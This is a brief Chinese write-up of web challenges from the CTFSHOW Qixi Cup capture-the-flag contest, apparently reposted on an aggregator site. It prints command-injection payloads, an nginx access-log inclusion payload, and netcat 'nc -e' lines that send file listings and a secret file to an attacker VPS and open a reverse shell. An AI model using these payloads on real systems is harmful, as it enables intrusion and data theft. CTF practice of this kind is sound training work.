CTFSHOW七夕杯web
Posted yu22x
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFSHOW七夕杯web相关的知识,希望对你有一定的参考价值。
文章目录
web签到
有长度限制
payload
ls />a
nl /*>a
然后访问a即可得到flag
easy_cmd
payload
num1=1;include "/var/log/nginx/access.log";&symbol=-&num2=3
然后就是日志包含那一套
easy_cmd
通过nc -e向自己的vps传递命令
nc x.x.x.x port -e ls /
nc x.x.x.x port -e cat /secert
也可以直接反弹个shell
nc x.x.x.x port -e /bin/sh
easy_sql
还在看
🌚
以上是关于CTFSHOW七夕杯web的主要内容,如果未能解决你的问题,请参考以下文章